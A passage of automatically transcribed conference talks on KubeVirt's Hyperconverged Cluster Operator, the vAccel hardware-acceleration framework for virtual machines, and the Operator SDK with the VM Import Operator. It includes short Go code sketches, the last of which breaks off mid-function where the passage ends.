affinity, and so on. This UI form has been rendered automatically from the OpenAPI v3 definitions embedded in the CRD of the HyperConverged CR. Of course I can also edit the YAML: here you see the spec stanza, where you configure what you want on your cluster, and you also see the conditions, which are consumed by the UI as well. Now you see that the deployment is in progress and more pods are being created. I am watching only the kubevirt-hyperconverged namespace here, so all of these pods are the ones needed to run this opinionated deployment of KubeVirt. You can see that it is still installing, and you can see the conditions describing what is happening on all the different components that are part of the whole product. And as you can see, we can create only a single instance of this kind, which is the CR for the Hyperconverged Cluster Operator.
Now we can see that we finally got the ReconcileComplete and Available conditions, which means that the install process finished properly and successfully. And indeed, if I go back to the installed operators, I see that my operator is finally green. This status is the way OLM communicates that our product has been successfully installed and properly configured, without any errors. Here we see that all the conditions are in the desired state, and we can also see some of the resources and all the events generated by our operator about what it did: it created a CR for the CDI operator, it created a ConfigMap and configured the storage, it created a CR for the network operator, and it created a CR for the VM import operator. Next steps. In the demo I installed the Hyperconverged Cluster Operator from a custom catalog source, but we are currently implementing a mechanism to automatically publish each new upstream release of the Hyperconverged Cluster Operator to OperatorHub; this way all community users will be able to easily find HCO in the OperatorHub without having to manually configure a special catalog source for it. Then we are going to continue integrating with OLM. In this session I talked a lot about conditions; OLM currently consumes only the readiness probe of one pod, but in the future OLM is also going to consume the conditions directly, and we are going to continue that integration to better communicate the status of our product to OLM, to get it visualized in the UI, and so on. And then we want to move up the operator capability levels. The operator capability level is a kind of maturity level for operators. It starts from the simplest features, like basic install. We are now at level 3, which means that we are able to support the whole lifecycle of the application, but we are planning to move higher. The next level — and we are working on it — is deep insights, which means that the operator is able to continuously collect and watch alerts and logs to provide workload analysis and eventually fine-tune its behaviour according to the real workload in the specific cluster. The final level is auto pilot, which means that the operator is able to auto-scale and auto-tune itself and to automatically self-heal in case of failures. For this we need to introduce additional logic and implement additional knowledge in the operator. So — time for questions and answers. Thank you.
KubeVirt enables developers to run containerized applications and virtual machines in a common, shared Kubernetes/OKD/OpenShift environment. An Operator is a method of packaging, deploying and managing a Kubernetes/OKD application. The Hyperconverged Cluster Operator is a unified operator deploying and controlling KubeVirt and several adjacent operators such as: - Containerized Data Importer - Scheduling, Scale and Performance - Cluster Network Addons - Node Maintenance - VM Import The Hyperconverged Cluster Operator delivers the domain-specific knowledge needed to orchestrate and automate the deployment and the upgrades of KubeVirt and its sibling operators in an opinionated and managed way. The Hyperconverged Cluster Operator can be installed on bare metal server clusters in a matter of minutes, even from a GUI, without requiring a deep knowledge of Kubernetes internals. The Hyperconverged Cluster Operator can be easily deployed in combination with rook.io to provide cloud native virtualization and distributed self-managing, self-scaling, self-healing storage services on a single cluster. An attendee will learn: - quick intro to KubeVirt technology (virtualization add-on for Kubernetes) - how to deploy and maintain it with the Hyperconverged Cluster Operator (deep-dive) - ongoing development and how to contribute
10.5446/52819 (DOI)
Hello everyone, I'm Anastasios Nanos, and in this talk we are going to present vAccel and how it can be used to expose hardware acceleration to workloads running inside virtual machines. Let's start with the problem we are trying to solve. More and more applications depend on hardware accelerators, and at the same time these applications are increasingly deployed in virtualized environments, inside VMs or as serverless functions, so the question is how such workloads can actually reach the accelerator hardware that lives on the host. The common option today is device passthrough, where the accelerator is assigned directly to the guest: the virtual device has the same characteristics as the hardware device, and the guest has to program the device itself, carrying the whole vendor runtime inside the VM. This creates significant friction when it comes to management and control: the VM becomes tied to a specific piece of hardware, which constrains scheduling, much like pinning vCPUs to physical CPUs does, and it becomes the host's job to place VMs only on the nodes that have the right devices. Moreover, the hardware is now driven from inside the guest rather than managed by the host, guests cannot see what other tenants are running on the same hardware, so safely sharing an accelerator between VMs becomes difficult, and each guest ends up depending on a specific vendor stack. A third issue is programmability and security: users should be able to consume acceleration without baking device-specific code into their applications and without weakening the guarantees they expect from running inside a VM. We started addressing these issues by looking for a hardware-agnostic way to consume acceleration from inside virtual machines.
One more dimension of the problem is security and isolation: infrastructure providers rely on the virtualization boundary to keep tenants and their data apart, so whatever mechanism exposes the accelerator to the guest must not weaken that boundary. So, let's now have a look at a high-level architectural view of the vAccel ecosystem and its components. The core of vAccel is the vAccel runtime system: it is the component that applications link against, and it exposes a hardware-agnostic API of acceleratable functions. To achieve this, the runtime system is split into two logical components. There is a base runtime system, vAccelRT, which is the part that applications actually link against, and there are plugins, the components that know how to actually execute an operation on a specific accelerator. This model allows us to decouple the application from the underlying hardware: you can build an application once, take the very same binary and move it to a completely different hardware setup without modifying or relinking it. Each vAccel plugin implements a set of operations. For example, you can have the Jetson plugin, which is built on top of the jetson-inference framework and offloads machine learning operations such as image classification, detection or segmentation, and there are plugins for other acceleratable functions, for instance linear algebra operations based on BLAS. What we want is to be able to target different kinds of hardware, and to run the exact same executable both on bare metal and inside a VM. To cover the VM case we designed virtio-accel, a paravirtual device whose purpose is to forward vAccel requests from inside the guest to the host, where the actual accelerator and its drivers live. When an application inside the VM calls a vAccel operation, the request goes through the virtio-accel device down to the hypervisor, so we end up with the same application running unmodified either directly on the host or inside the guest. On the hypervisor side we have implemented this device for QEMU, and the host side links against the same vAccel runtime with whatever backend plugin is loaded there, for example the jetson-inference one.
And finally, the last piece of our stack is the paravirtual transport that bridges the guest and the host. It consists of a Linux kernel module, the virtio-accel frontend driver, built for kernel 5.4, and the corresponding backend implementation in the hypervisor, which exists for both QEMU and Firecracker. To make the frontend and backend interplay more concrete, let's walk through an image classification operation issued from inside a VM: the user application runs inside the VM and links against the vAccel runtime system with the virtio plugin module loaded, which talks to the virtio-accel frontend driver in the guest kernel, and then the hypervisor itself links against the vAccel runtime system on the host this time, which, instead of the virtio plugin module, uses the jetson-inference module to offload the operation onto an NVIDIA GPU. So when the user application calls image classification, the vAccel runtime is triggered and it does a few things. The first thing it does is to look for a plugin that implements that operation, and if one is found it offloads the operation to that plugin. In this particular example the virtio plugin does implement the image classification operation, so the execution is passed to the code of the virtio vAccel plugin. The plugin itself just checks whether the virtio device is present and translates the call into an ioctl request with all the arguments of the operation. Once the ioctl request is sent, the frontend driver takes care of creating a virtio request. It packs inside the request the operation type, in this case image classification, along with the arguments of the operation, inserts the request into the virtqueue and then kicks the virtqueue, which in turn causes an exit into the hypervisor. The virtio-accel specific code of the hypervisor parses the request, validates it, checks that it supports the operation and that the arguments being passed are sane, and in turn calls the image classification API, the vAccel API of the runtime system living on the host. The runtime system living on the host does exactly the same steps as the one inside the VM: it looks for a backend plugin that implements image classification and offloads the execution to it. In this case we have loaded the jetson-inference vAccel plugin, so the execution passes to this plugin, which performs the CUDA calls to the GPU device residing on the host and performs the actual computation. So this is our framework; this is how a complete workflow of our framework works today, and you can try it yourself. We are going to show a demo doing exactly that later on. Now, our future steps are summarized in the following slide. First, we would like to stabilize the user-facing API. We are done with integrating the various components and finished with porting vAccel to the Firecracker hypervisor. Next we want to develop more backend plugins, so that we can target more accelerator devices and expose more acceleratable functions to the end user. The other thing we want to investigate is the transport layer for offloading execution from inside the VM to the host. At the moment, as we saw, we are using the tailored virtio device that we designed and implemented for vAccel, but there are other options.
The problem with the virtio-accel module, despite the fact that it adds very little overhead since it is tailored exactly to the vAccel API, is that it results in a design that very tightly couples the vAccel API and runtime with the hypervisor and the kernel module itself. That means that every time we change something in the API or the runtime itself we need to perform the corresponding changes both in the hypervisor and in the virtio frontend module, which can be tedious and error-prone. Alternatives exist, such as the virtio socket device (vsock), which essentially provides a channel from inside the guest to the host through sockets; this would decouple the implementation of the runtime and interface from the hypervisor and the kernel module, and it would allow us to migrate in the future to any hypervisor that implements the socket, potentially with a small overhead cost due to the more generic protocol that needs to be used. Finally, we want to look into security, into the security semantics of vAccel. For example, we want to provide stronger guarantees for isolation between different contexts, with different guests using the same accelerator device, avoiding for example data poisoning attacks, and also ensure that the users of the host device are certified and are allowed to actually use that device, and finally provide bindings for more high-level programming languages. Now let's jump to a small demo that is going to show you the functionality of vAccel and the workflow of running a vAccel application both on bare metal and in a VM. Okay, let me now switch my window to the demo. So I will be using for this demo a simple application that is essentially an HTTP server that routes POST requests at a particular URL to a handler that uses the vAccel API to classify an image. The image is passed inside the body of the POST request. So here is our application. It is interesting to see that the application indeed is only linked against the base vAccel runtime system; it is not linked against any hardware specific library like CUDA or anything of the like. I am at the moment running on an x86 machine with a GeForce RTX 2060, so I will want to use the jetson-inference plugin to run the computation. You can tell the runtime which backend plugin to use by exporting this environment variable and pointing it to the dynamic library that implements the plugin. So in our case it's going to be this. Okay, and let's start the application. Okay, let's see what we get here. So the application bootstrapped the runtime system at the beginning and it loaded the available plugins. At the moment it found the jetson-inference plugin and it registered all the vAccel functions that that plugin implements, which in this case are image classification, detection and segmentation. So now I'm going to send a POST request through curl to the server and see what happens. On the top right pane of my window I have nvtop running, which is going to show us any action on the GPU, so if everything runs okay we should see some activity here. I will be using a set of images from the GoogLeNet pretrained model, and the application itself is using the GoogLeNet model to classify the input. So here it goes. We send a POST request to this URL, and we pass the image as raw binary from here. Okay, a few things happened here. First, we can see that nvtop reports some utilization on the GPU.
Second, we see that our request received a response in its body. The response includes the host name of the machine that the HTTP server is running on and the tags of the image classification. On the application itself we see some action: the application received the request, it created a new vAccel session, and what happens next is that upon calling image classification the vAccelRT looks for an available implementation of this operation. It finds such an implementation in the jetson-inference plugin and it offloads the computation to the jetson-inference plugin, which in turn offloads it to the GPU. Perfect. So let's see how we can do the exact same thing but running in a Firecracker VM. So I'm going to launch a Firecracker VM. Let me see. Okay. So in here there is already a web classify binary, which I am going to delete, so I can show you that we will be using the exact same binary that we used before. So from here I'm going to SCP the binary that we used before into the VM and I'm going to SSH into it from here. So we have again the web classify binary here. So let's launch it. In this case we need to use a different plugin: we need to use the virtio plugin. So the application launched here is going to be using the virtio plugin, whereas Firecracker itself is linked against the vAccel runtime and is using the jetson-inference plugin, as we exported the environment variable before on the host. So I'm just launching the classify binary. We see the same bootstrap sequence: vAccel is initializing, it's looking for available plugins, it finds the virtio-accel plugin, it registers the functions that this plugin exposes, among them the image classification function which we are interested in, and our server is running. So let's do exactly what we did before, but point to this new server. Right. So similar things happened. We do see action on the GPU, which is good: it means that our request from inside the VM was offloaded to the host and to the GPU. We got our response, and now it is this host that answers us, the server running inside the VM, and we got again the tags for the request. Inside the VM a new session was created, the runtime looks for a plugin implementing image classification, it finds an implementation in the virtio-accel plugin, and it executes the image classification code using the virtio-accel plugin. The virtio-accel plugin uses the virtio-accel device to offload the request to the host, and here in fact we see that the vAccel runtime that is linked with Firecracker is itself creating a session ID; in fact all session handling is happening on the host, so the host knows exactly who is running and isolates the sessions between the users. It then looks for a plugin implementing image classification; in this case on the host we have the jetson-inference plugin loaded, so that is the code that executes. It uses ImageNet to classify and returns the result from here to here and back to the application, and a response to our curl request. So that was it, let's move back to the presentation. Okay, summarizing, we presented vAccel, which provides a user-friendly and intuitive API for writing applications that want to access hardware accelerator capabilities. The design of vAccel inherently enables code portability: it is trivial to migrate an application written with the vAccel framework, since there is actually no device specific code linked into the application.
Through the VM capabilities of vAccel, allowing a vAccel application to run inside a VM, we can isolate the application from the hardware completely, and all this comes of course at some cost. The cost that we have to pay is that someone needs to write the code implementing the vAccel API, lowering the vAccel API to particular hardware devices; for example, a serverless platform that runs on a particular hardware device needs to make sure that it owns the plugins that implement the vAccel API for this device. And of course we need to take into account the security implications of sharing hardware resources: the VM boundary does provide isolation, but still the users access the same hardware device. Thank you very much for attending. I would like to invite you to see these other presentations we have related to vAccel, if you find vAccel interesting indeed. In the containers devroom you can see our work on porting vAccel to a Kubernetes cluster using Kata Containers and AWS Firecracker, and in the microkernels devroom you can see our effort in porting vAccel to two popular unikernel frameworks, Rumprun and Unikraft. Finally, I would like to acknowledge that this work has been funded by the 5G-COMPLETE Horizon 2020 project.
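For readers who want a feel for the shape of the demo application described above, here is a minimal Go sketch of an HTTP server that routes POST requests carrying a raw image body to a classification handler. The actual demo binary links against the vAccel C runtime; the classifyImage function and the /classify path below are hypothetical stand-ins, not part of any real vAccel binding or of the talk's exact code.

```go
// Sketch of the demo's web front end: POST an image, get back classification tags.
// classifyImage is a placeholder for the real vAccel image classification call.
package main

import (
	"fmt"
	"io"
	"log"
	"net/http"
	"os"
)

// classifyImage is a hypothetical stand-in for the vAccel call used in the demo.
func classifyImage(img []byte) (string, error) {
	return fmt.Sprintf("stub: %d bytes received", len(img)), nil
}

func classifyHandler(w http.ResponseWriter, r *http.Request) {
	if r.Method != http.MethodPost {
		http.Error(w, "use POST with a raw image body", http.StatusMethodNotAllowed)
		return
	}
	img, err := io.ReadAll(r.Body)
	if err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	}
	tags, err := classifyImage(img)
	if err != nil {
		http.Error(w, err.Error(), http.StatusInternalServerError)
		return
	}
	host, _ := os.Hostname()
	// The demo's response contained the host name and the classification tags.
	fmt.Fprintf(w, "host: %s\ntags: %s\n", host, tags)
}

func main() {
	// The URL path is illustrative; the talk does not spell out the exact endpoint.
	http.HandleFunc("/classify", classifyHandler)
	log.Fatal(http.ListenAndServe(":8080", nil))
}
```

Sending a request with curl --data-binary @image.jpg http://localhost:8080/classify mirrors the raw-binary POST used in the demo.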
The debate on how to deploy applications, monoliths or micro services, is in full swing. Part of this discussion relates to how the new paradigm incorporates support for accessing accelerators, e.g. GPUs, FPGAs. That kind of support has been made available to traditional programming models the last couple of decades and its tooling has evolved to be stable and standardized (eg. CUDA, OpenCL/OpenACC, Tensorflow etc.). On the other hand, what does it mean for a highly distributed application instance (i.e. a Serverless deployment) to access an accelerator? Should the function invoked to classify an image, for instance, link against the whole acceleration runtime and program the hardware device itself? It seems quite counter-intuitive to create such bloated functions. Things get more complicated when we consider the low-level layers of the service architecture. To ensure user and data isolation, infrastructure providers employ virtualization techniques. However, generic hardware accelerators are not designed to be shared by multiple untrusted tenants. Current solutions (device passthrough, API-remoting) impose inflexible setups, present security trade-offs and add significant performance overheads. To this end, we introduce vAccel, a lightweight framework to expose hardware acceleration functionality to VM tenants. Our framework is based on a thin runtime system, vAccelRT, which is, essentially, an acceleration API: it offers support for a set of operators that use generic hardware acceleration frameworks to increase performance, such as machine learning and linear algebra operators. vAccelRT abstracts away any hardware/vendor-specific code by employing a modular design where backends implement bindings for popular acceleration frameworks and the frontend exposes a function prototype for each available acceleration function. On top of that, using an optimized paravirtual interface, vAccelRT is exposed to a VM’s user-space, where applications can benefit from hardware acceleration via a simple function call. In this talk we present the design and implementation of vAccel on two KVM VMMs: QEMU and AWS Firecracker. We go through a brief design description and focus on the key aspects of enabling hardware acceleration for machine learning inference for ligthweight VMs both on x86_64 and aarch64 architectures. Our current implementation supports jetson-inference & TensorRT, as well as Google Coral TPU, while facilitating integration with NVIDIA GPUs (CUDA) and Intel Iris GPUs (OpenCL).
10.5446/52820 (DOI)
Hi, today I will tell you about a tool we've developed to allow Kubernetes users to import virtual machines from oVirt or VMware to KubeVirt. My name is Jakub John and I'm a Senior Software Engineer at Red Hat. I'm one of the VM Import Operator developers. I'm a seasoned Java developer and a baby Go developer. In my free time I'm a Polish Java user group co-leader and a GeeCON conference co-founder and co-organizer. The agenda for the presentation is as follows. For starters, to establish context, I will explain a few keywords that I will be using throughout the presentation. Next I will talk about the Operator SDK and how it can be used to build Kubernetes applications in Go. That will be followed by a demo. After the demo I will explain what the virtual machine import operator is and how it can be used, and I will demo an actual virtual machine import from oVirt to KubeVirt. Having a basic understanding of how the Operator SDK functions will help in understanding how we used it to build the virtual machine import operator. After all of that I will move to a short summary. Without further ado, let's move to the keywords. Starting with oVirt, which is an open source distributed virtualization solution designed to manage enterprise infrastructure. oVirt manages KVM based virtual machines. KubeVirt is an open source technology that allows KVM virtual machines to be run as Kubernetes pods. CDI, Containerized Data Importer, is a service designed to import virtual machine images for use with KubeVirt. CR stands for Custom Resource, and that's an object that extends the Kubernetes API. CRD is Custom Resource Definition, and that's a description of a custom data model in Kubernetes. Controllers are programs that observe the state of the cluster and make sure it is in a desired state. An Operator is a piece of software that is capable of managing stateful applications or processes in Kubernetes; a piece of software that automates work that otherwise would have to be performed manually by a human operator on a system, for example database deployment, configuration and upgrade. An Operator is a specialized controller focused on its own CRD. The Hyperconverged Cluster Operator is responsible for deploying and controlling KubeVirt and several related operators. Let's talk about the Operator SDK first. The Operator Framework is a CNCF incubating project and it is built upon three pillars: the Operator SDK, which is a development kit for building Kubernetes applications, providing high level APIs, useful abstractions and project scaffolding; the Operator Lifecycle Manager, which facilitates management of operators on a Kubernetes cluster; and the last one, OperatorHub, which is a place for sharing operators. The Operator SDK hides Kubernetes related complexity, especially the parts related to object management, access and monitoring. The SDK provides robust scaffolding that can prepare a working operator that only needs to be updated with resource definitions and domain specific logic in gaps left in the code. There is no need to dig into infrastructure code until it is really needed. The logic encapsulated within an operator is executed in a reconciliation loop that starts when there is a change to an observed resource. The responsibility of that code is to find out what changed and what is the new desired state of a managed resource, perform actions to move the managed resource towards the desired state, and finally break the reconciliation cycle when the resources are at the desired state.
The use case of an operator would be managing life cycle of a system comprising of multiple interconnected subsystems. Let's imagine a system of two multi-instance applications communicating through some messaging system and one of them using a database. It could be deployed on different kinds of infrastructure and managed manually by a human operator equipped with tons of automation scripts. The system is about to be migrated to Kubernetes. So it can look like that and be manageable. One option is to modify existing scripts and still execute them manually or create a software operator that can perform any operations human operator executed. For example, creating deployments with images in desired version and numbers of instances. Plug in and storage for DB and messaging, letting the applications know about each other, making upgrades of the components you name it. Having discussed the purpose of the operator's decay, let's see what is actually needed to create an operator with it. First we need to bootstrap the project. Next, we need to generate API code and update it with our domain specific details. Afterwards, when the data model is ready, we need to generate manifests that make the operator usable in a Kubernetes cluster. The actual logic behind processing our CR needs to be implemented in a designated place in the generated code. The last thing left to do it is to run it. Let's have a go at a demo. Let's create a directory for our project, eco operator. Inside that directory, let's execute operator SDK init command providing domain that will be used as the name of a group of our resources and repo that will be used as the name of our goal module. After operator SDK does its thing, we'll move to IDE to have a look at the generated code. There we go. We've got make file that we can use to build our project and execute other tasks. We've got main goal file that is the entry point for the application. We've got goal mod file which defines dependencies. We've got docker file for our images and several directories with manifests, with binaries and boilerplate command. Let's generate initial version of our API using create API command providing the name for our resource and the version. And let's request generation both of the resource and the controller. After operator SDK is done, we should see new directories in our project tree, API and controllers. There they are. API package contains versioned definition of our resource, echo, which contains specification which should correspond to information that is passed by the user to the operator and status that should represent information about processing of our CR reported by the operator. Resource package contains ecocontroller file which defines eco-reconciler structure that implements reconciler interface provided by the operator SDK. The reconciler method is executed whenever watch resource changes. Let's have a look at implementation. And here we can see room left for our logic to be implemented. And the information about CR changed are in the request parameter. The method returns result and error. If there is no error, the processing ends. Let's update our specification so it can be used in our operator properly. Let's define a message field of type string that will represent a message that we want the operator to print to its logs. In the status structure, let's put a field representing time stamp of the last message processing that will be updated by the operator upon processing of our message. 
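To make the two fields just described concrete, here is a minimal Go sketch of what the Echo types could look like. It follows the usual operator-sdk/kubebuilder layout; the package and field comments are illustrative rather than the literal code from the recording.

```go
// api/v1alpha1/echo_types.go (sketch; group registration lives in a separate generated file)
package v1alpha1

import (
	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
)

// EchoSpec holds the user-provided input for the operator.
type EchoSpec struct {
	// Message is the text the operator should print to its log.
	Message string `json:"message,omitempty"`
}

// EchoStatus is reported back by the operator.
type EchoStatus struct {
	// LastMessageTimestamp records when the message was last processed.
	LastMessageTimestamp *metav1.Time `json:"lastMessageTimestamp,omitempty"`
}

// +kubebuilder:object:root=true
// +kubebuilder:subresource:status

// Echo is the Schema for the echoes API.
type Echo struct {
	metav1.TypeMeta   `json:",inline"`
	metav1.ObjectMeta `json:"metadata,omitempty"`

	Spec   EchoSpec   `json:"spec,omitempty"`
	Status EchoStatus `json:"status,omitempty"`
}

// +kubebuilder:object:root=true

// EchoList contains a list of Echo.
type EchoList struct {
	metav1.TypeMeta `json:",inline"`
	metav1.ListMeta `json:"metadata,omitempty"`
	Items           []Echo `json:"items"`
}
```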
It's good to comment our fields because those comments will be used in the schema definition of our CRD. We will see them a bit later. Now we can generate our boilerplate go code that's responsible for copying our objects. This is generated deep copy go file using make generate command. There we go, a lot of deep copy and deep copy objects methods. Let's generate manifests for our operator using make manifests command. And the manifests will be present in config CRD basis directory of our project. There it is, we have custom resource definition that has name echo designpl. The resource belongs to group designpl is of kind echo and it defines version view 1 and alpha 1 and it will be namespaced. There we can see the schema of our resource. There is the comment that we've put in the go code, same for last message timestamp. Let's update our eco controller to do what it needs to do. First we need to retrieve our echo object from the cluster using get method provided by the operator SDK to ease interactions with Kubernetes. We need to provide the name and the namespace of our object to be retrieved. So we use namespace name that came in the request. In case the object is not found in the cluster we want to stop processing because the object has been deleted. So we return no error and the result. Otherwise when there is some other error we return result and error. In that case the reconciling method will be re-executed. Now we can update the time in our echo object. Now we need to persist that object in the cluster using yet another method provided by the operator SDK or update for the status part of the object. In case of an error we will return result and the error which will again, retrigger reconciliation. After updating the object we can execute our logic so printing the message to the output and then we can return result and nail as an error which will end the reconciliation loop for that CR. Let's confirm that we don't have our CRD defined in the cluster. Yes, it's not present. Let's use make install to install our manifests in the cluster. Now we should see the CRD. Yes, there is. And we can execute make run to start our operator. And it's running, waiting for input. We can use another generated file residing in samples and directory. We change it to our needs so provide message. We apply the manifest against the Kubernetes cluster and we should see our message in the logs. Yes, it is but twice. The second message has been printed because the reconciliation method is executed every time the CR is updated. And we do update it inside the reconcile method so we see the message twice. Let's remove the second message by limiting sensitivity of our reconcile method to only changes to the specification. After starting the operator we should see only one message. And it prints the message because the CR already exists in the cluster so it reads it on startup. Now we can change our manifest and apply it against the cluster and see what happens. It's been changed and we can see the message. The CR changed so the reconciliation has been executed. If we execute the same application again we won't see the message because there is no change. Let's change the message back to the original one, apply it again and we will see the message again in the logs. Let's inspect our CR and see what's the status. Here we can see last message timestamp which corresponds to the time printed in logs. There it is. The only difference is in representation of the time. 
In one case it's UTC and in the other case it's Central European time so there is one hour difference in the printed message in this case. Here is the UTC one. Let's have a look at the virtual machine import operator. The Kubernetes is on the rise and thanks to its capabilities many developers and administrators want to migrate their workloads there and that is not always easy to ease that burden. We have created VM import operator that will automatically translate your VM configuration, copy its disks and start it on target Kubernetes cluster. The virtual machine operator is a Kubernetes operator so it's run within the cluster that is able to import compatible KVM and VMWare based virtual machines into that cluster where they would be run by QVM. Same compatible is important, not all options that are available in vanilla KVM hypervisor are available in QVM. The operator takes care of checking the source VM configuration and reports its finding to the user. For all VIRT the KVM based VMs disks are imported as they are. CDI copies them to Kubernetes storage. In case of VMWare additional step is required. Guest conversion using V2V after CDI copies the disk to Kubernetes storage. The virtual machine operator was written using the operator SDK in Go. And let's have a look at the environment of the VM import operator and its collaborators. As mentioned earlier the operator is deployed in a Kubernetes cluster. It runs in two pots. VM import operator and VM import controller. I will talk about the responsibilities a bit later. It reads or creates cluster objects like secrets, config maps, storage classes, jobs or network attachment definitions. The operator creates virtual machine objects which are supervised by QVIRT. CDI in turn is used to transfer disk images to Kubernetes storage. The last system that takes part in the import process is OVIRT that manages the imported machine. VM import operator reads metadata of the imported VM, requests shutdown for the import process and startup in case of an import failure. CDI in turn connects to the OVIRT to download the disk images and stores them in Kubernetes storage. Let's have a look how it works in practice. For the purpose of that presentation I have created a virtual machine in my OVIRT cluster. Let's have a note of its identifier. We'll use it a bit later. That VM has one network interface which is connected to APS network and it's using APS profile. The virtual machine has one disk which is a bootable disk hosting Fedora OS. Let's connect to the machine using VNC. Being there we can leave a message to ourselves that we check after the migration. Now I will show you what kind of resources need to be created to perform the virtual machine import. First we need to have a secret, Kubernetes secret containing information about our OVIRT cluster. We name it OVIRT secret, we place it in default namespace and we provide URL to our OVIRT engine, we provide username and password to it and we provide CA certificate that will be used while validating the OVIRT server. The other file we need is the virtual machine import resource that defines what needs to be migrated and add some options to that. So we name that FOSDM VM import, we place it in the default namespace, we reference the secret we've just created, we specify the name of the VM in Kubernetes, we specify where the VM should be started after the import and we provide ID of our OVIRT virtual machine that we want to import. We also have to provide mapping of resources from OVIRT to Kubernetes. 
So in this case we map disk with that ID to standard storage class. In case of network we map network used by the virtual machine in OVIRT to be of type POD. So it will be a POD network. Let's confirm that our storage class is available in the cluster, the operator otherwise would report a error. Yes it is, it exists. Let's apply the secret against the cluster. Let's create the virtual machine import object. It's been created. Let's have a look what is the status of that object. It should have the status updated at this stage and we can see that validation was completed successfully. The configuration of VM reported some warnings that do not block the VM from being imported. Let's refresh it and now the disk copying is running. So now we are waiting for the VM disk to be present in Kubernetes. Let's have a look. We should have data volume created for that. Yes it is, it's being populated and we can wait for it to be done. When the import is done we should see that our virtual machine import succeeds. Let's have a look at the virtual machine in OVIRT. It's down. For the time of the import the virtual machine is shut down and it stays this way if the VM starts successfully in QVIRT. The disk of the virtual machine is pretty large so it will take some time to complete. We're almost there. It's 100%. It should report successful in a moment. Yes it's successful. Let's have a look at our virtual machine import CR. What is the status of it? We can see that the virtual machine is ready and it's successful. Also there is another way of tracking progress of the import. There is an annotation on our CR that shows what is the percentage of the import. We also have an annotation showing what was the original state of the virtual machine. That's our virtual machine instance running in Kubernetes. It's got podnetwork address assigned. Let's connect to it using SSH. We need to get into the cluster network and SSH to it. It worked. Let's have a look at our hello file. It's there and it provides the proper date. Let's also connect graphically to our virtual machine. It should be possible with Vue CTL command. After the login we'll check the hello file and confirm that it's actually the same virtual machine and it works correctly. Yes, it is. Virtual machine import operator design. Virtual machine import operator comprises of two single container pods, VM import controller and VM import operator. VM import controller pod is responsible for executing the VM import reconciliation loop. And VM import operator's responsibility is managing lifecycle of the VM import controller and all related resources, CRDs, service account, role, role-binding, deployment and services. It uses controller lifecycle operator SDK and library that was created from code developed by the CTI developers for the needs of their project. The code was so useful and applicable in other scenarios that I've extracted and modified it to create the library and use it in the VM import operator. In fact, using that library gives an operator compatibility with HCO requirements. The library provides code that manages resources defined by a developer. It undertakes proper actions when creation, removal or upgrade is requested. If one wanted to implement operator that manages multiple resources and makes sure that their configuration is always correct and allow for updating them, for example upgrading version of a container within deployment, one would have to spend a lot of time implementing tedious state machine code. 
The library makes it as easy as implementing a few interfaces and using provided structure in the reconcile method. If one needs to have many separate applications managed in a similar way, the controller lifecycle operator SDK is a thing to use in each of these operators. Library is extensible so it can be applied in very different use cases. The controller lifecycle operator SDK consists of several packages that can be used together or separately. API package defines common types and constants that are required by the other parts of the library and that are compatible with HCO. SDK package provides several helper functions used in the other parts of the library. Callbox package provides callback registration and dispatching facilities used to execute additional resource management logic in predefined places in the reconciliation loop. Reconciler package provides resource definition helpers for creating them with only a few method parameters. It can remove a lot of boilerplate related to creating deployment, service and other types of resources. Open API package in turn provides open API definition of the common status structure. Reconciler package provides reconciler structure responsible for executing lifecycle reconciliation. Reconciler wants to use the reconciler as to provide a resource type definition that makes use of SDK provided status type and implementation of a following interface where most of the methods take the user defined CR as parameter. Here is an example of an actual status definition making use of the SDK type. The code comes from a reference implementation of an operator using the SDK. I invite you to have a look at it and see how simple it is to create an operator that can oversee multiple resources. CR manager methods are mostly one-liners except for getAllResources method which provides instances of managed resource objects and it can be as long as many resources you need to oversee. After the overview of the infrastructural part of the operator, let's have a look at the domain side of it. Virtual machine import is a namespace custom resource that defines the source of the VM, the identifier of the VM on the source and the mapping to be used for the import. The mapping of resources, network and storage from the external VM provider to Qubeword is defined in the resource mapping custom resource. What is secret is needed to define the endpoint and credentials to the source provider. The virtual machine import resource creation triggers the reconciliation and the first step there is to retrieve virtual machine information from the source provider. Then that virtual machine is validated. The source virtual machine is stopped after the validation and then there is a virtual machine created in Qubeword. Hello meaning it doesn't have disks yet. The disks will be imported later by CDI. The reconciliation code creates data volumes to request the import of data from Ovid to Kubernetes. And then those data volumes are monitored by our operator to continue its own processing when they are done. In case of VMware the guest has to be converted after the disk is present in Kubernetes and that is executed in a job for which the operator also waits. When it's done the virtual machine is started. Let me highlight the key takeaways from my presentation. After this talk you should have awareness of the VM import operator and how it can be used to help with infrastructure migration from virtual machine based one to a container centric one, Kubernetes. 
The information provided about the Operator SDK and the controller lifecycle operator SDK should allow you to start working with them to address the specific needs you may face in Kubernetes. Thank you very much. Okay. Hi, I think I answered the question regarding some resources. Just to recap, there is the readme of the controller lifecycle operator SDK, that's the description, and also the actual production usage in the VM import operator and in CDI, which has also been refactored to use that library. Also, as I mentioned on the slide, the controller lifecycle operator SDK contains an example implementation. Do you have any other questions, or did I miss anything? Thank you very much for listening.
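As a compact recap of the Operator SDK demo from earlier in this talk, here is a Go sketch of the reconcile loop that was built step by step: fetch the Echo object, tolerate deletion, stamp the status, print the message, and only react to spec changes. It uses controller-runtime as the generated scaffolding does; the module path is a placeholder, the spec-change filter shown is one common way to achieve what the demo did, and depending on the operator-sdk version the Reconcile method may or may not take a context argument, so treat this as an illustration rather than the literal demo code.

```go
// controllers/echo_controller.go (sketch)
package controllers

import (
	"context"
	"fmt"

	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
	"k8s.io/apimachinery/pkg/runtime"
	ctrl "sigs.k8s.io/controller-runtime"
	"sigs.k8s.io/controller-runtime/pkg/client"
	"sigs.k8s.io/controller-runtime/pkg/predicate"

	echov1alpha1 "github.com/example/echo-operator/api/v1alpha1" // placeholder module path
)

// EchoReconciler reconciles Echo objects.
type EchoReconciler struct {
	client.Client
	Scheme *runtime.Scheme
}

// Reconcile is called every time a watched Echo object changes.
func (r *EchoReconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
	var echo echov1alpha1.Echo

	// Fetch the Echo instance named in the request.
	if err := r.Get(ctx, req.NamespacedName, &echo); err != nil {
		// The object may have been deleted; nothing to do in that case.
		return ctrl.Result{}, client.IgnoreNotFound(err)
	}

	// Record when we processed the message and persist it in the status subresource.
	now := metav1.Now()
	echo.Status.LastMessageTimestamp = &now
	if err := r.Status().Update(ctx, &echo); err != nil {
		// Returning the error re-queues the request for another attempt.
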